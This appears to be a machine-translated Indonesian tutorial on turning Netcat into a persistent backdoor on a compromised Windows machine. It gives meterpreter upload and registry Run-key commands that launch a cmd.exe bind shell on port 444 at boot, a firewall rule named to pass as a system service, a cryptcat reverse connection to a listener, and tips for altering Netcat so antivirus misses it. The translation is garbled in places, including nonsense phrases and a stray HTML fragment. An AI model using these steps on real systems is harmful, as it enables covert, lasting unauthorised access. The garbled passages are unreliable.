Agen Persisten Kali Linux NetCat

Pada artikel ini, kita akan membahas hal-hal yang dapat Anda lakukan dengan utilitas jaringan yang disebut Netcat, Swiss Army Knife of Network Tools.

Pengantar:

Netcat adalah utilitas jaringan yang dapat membaca dan menulis ke port UDP dan TCP. Ini sering disebut sebagai alat peretasan Swiss Army karena dapat melakukan beberapa hal baik sebagai client dan server selama petualangan peretasan. Kami akan sering menggunakannya untuk membuat ikatan dan membalikkan kap kulit di sekitar laporan untuk melihat apa yang terjadi dan mengirim file antar engine. Shell adalah cara Anda dapat berinteraksi dengan komputer seperti command prompt di Windows atau terminal di Linux. Netcat memungkinkan kita untuk melakukan banyak hal seperti rak terbalik, untuk berkomunikasi antara dua atau lebih komputer, dan akan memungkinkan Anda untuk melakukan banyak fungsi. Netcat dapat melakukan Pemindaian Port dan terhubung ke port terbuka menggunakan argumen perintah sederhananya. Itu juga mampu mengirim file dan menyediakan administrasi jarak jauh baik melalui shell langsung atau terbalik.

Mempekerjakan Netcat sebagai agen persisten:

Netcat adalah program yang sangat serbaguna dan berguna. Saya telah menyebutkan sebelumnya dalam artikel ini bahwa itu digunakan untuk berkomunikasi antara dua komputer. Itu juga dapat digunakan jika Anda ingin menginstal kegigihan. Netcat dapat digunakan sebagai pintu belakang. Jadi mari kita mulai dengan membuat shell persisten pada sistem yang disusupi dengan menggunakan Netcat. Kami akan menggunakan -nc.exe, karena itu nama yang dapat dieksekusi. Tetapi jika Anda mengganti nama sebelum menggunakannya meminimalkan kemungkinan deteksi. Namun, bahkan setelah mengganti nama perangkat lunak anti-virus dapat mendeteksinya. Banyak peretas mengubah beberapa elemen kode sumber Netcat, yang tidak perlu dan, sebelum menggunakannya, mengkompilasi ulang. Perubahan ini akan membuat Netcat tidak terlihat oleh perangkat lunak Anti-virus.

Di Kali, Netcat disimpan di /usr/share/windows-binary. Untuk mengunggahnya ke sistem yang disusupi, gunakan perintah dari dalam meterpreter:

$ meterpreter> upload/usr/share/windows-binaries/nc.exe C:WINDOWSsystem32

Ada banyak jenis file di folder ini, untuk menyembunyikan file di sistem yang disusupi itu adalah tempat terbaik

Anda juga dapat menggunakan protokol transfer file Trivial jika Anda tidak memiliki koneksi meterpreter untuk mentransfer file.

Langkah selanjutnya adalah mengonfigurasi registri sehingga Anda dapat meluncurkan Netcat saat sistem dijalankan dan memastikannya mendengarkan pada port 444. Gunakan perintah yang diberikan di bawah ini:

$ meterpreter> reg setval -k HKLMsoftwaremicrosoftwindows
currentversionrun -vv nc -d 'C:windowssystem32nc.exe -Ldp 444
 -e cmd.exe'

Sekarang Anda telah menggunakan perintah yang disebutkan di atas, gunakan perintah queryval berikut untuk memastikan keberhasilan penerapan perubahan dalam registri.

$ meterpreter> reg queryval -kHKLMsoftwaremicrosoftwindows
currentverionrun -vv nc

Buka port pada firewall lokal untuk mengonfirmasi bahwa sistem yang disusupi akan menerima koneksi jarak jauh ke Netcat dengan menggunakan perintah $netsh. Untuk mengetahui sistem operasi target memegang kepentingan utama. Konteks command line yang digunakan untuk Windows Vista, Windows Server 2008, adalah

$ netsh advfirewall

Untuk sistem sebelumnya, perintah firewall $netsh digunakan. Masukkan perintah shell pada prompt meterpreter untuk menambahkan port ke firewall Windows lokal, masukkan aturan menggunakan perintah yang sesuai. Agar sistem berfungsi dengan baik, nama user seperti ‘svchostpassthrough’ saat memberi nama aturan. Contoh perintah ditampilkan sebagai berikut:

$ C:Windowssystem32> netsh firewall add port opening
TCP 444"service pass-through"

Untuk mengonfirmasi perubahan berhasil diterapkan menggunakan perintah berikut:

$ C:windowssystem32> netsh firewall show port opening

Setelah konfirmasi aturan port, pastikan opsi reboot berfungsi.

Masukkan perintah berikut dari prompt meterpreter:

lass=" notran
slate="">$ meterpreter> reboot

Masukkan perintah berikut dari shell Windows interaktif:

$ C:windowssystem32> shutdown -r -t 00

Untuk mengakses sistem yang disusupi dari jarak jauh, ketik $nc pada prompt perintah, tunjukkan verbositas koneksi (-v dan -vv masing-masing melaporkan informasi dasar, lebih banyak informasi), lalu masukkan alamat IP target dan nomor port.

$ nc -v 192.168.43.128 444

Sayangnya, Netcat memiliki beberapa keterbatasan, yaitu tidak ada otentikasi data yang dikirimkan, dan perangkat lunak anti-virus dapat mendeteksinya. Namun, masalah enkripsi yang kurang dapat diselesaikan dengan menggunakan cryptcat, yang merupakan alternatif dari Netcat. Selama transmisi antara host yang dieksploitasi dan penyerang, ia mengamankan data dengan menggunakan enkripsi Twofish. Tidak salah untuk mengatakan bahwa itu memberikan perlindungan yang cukup kuat untuk data terenkripsi.

Pastikan ada pendengar yang siap dan dikonfigurasi dengan Kata Sandi yang kuat untuk menggunakan cryptcat, gunakan perintah berikut:

$ sudo cryptcat –k password –l –p 444

Langkah selanjutnya adalah mengunggah cryptcat ke sistem yang disusupi dan mengonfigurasinya untuk terhubung dengan alamat IP pendengar menggunakan perintah berikut:

$ C:cryptcat –k password <listener IP address> 444

Sangat disayangkan untuk mengatakan bahwa Netcat dan variannya dapat dideteksi oleh perangkat lunak anti-virus. Dengan menggunakan editor hex untuk mengubah kode sumber Netcat, ada kemungkinan Netcat tidak akan terdeteksi. Tapi itu adalah proses trial-and-error yang panjang. Pendekatan yang lebih andal adalah dengan menggunakan mekanisme ketekunan Metasploit Framework.

Kesimpulan:

NETCAT adalah Pisau Tentara Swiss yang digunakan untuk peretasan yang efisien. Itu dapat melakukan beberapa fungsi untuk mengakses server dan client. Artikel ini memberikan gambaran singkat tentang fungsi dan useran NETCAT. Saya harap Anda menyukainya jika artikel ini membantu Anda, maka bagikan dengan teman-teman Anda. Jangan ragu untuk bertanya tentang pertanyaan apa pun yang Anda miliki tentang NETCAT. Anda juga dapat membagikan pendapat Anda dan detail lebih lanjut.

Related Posts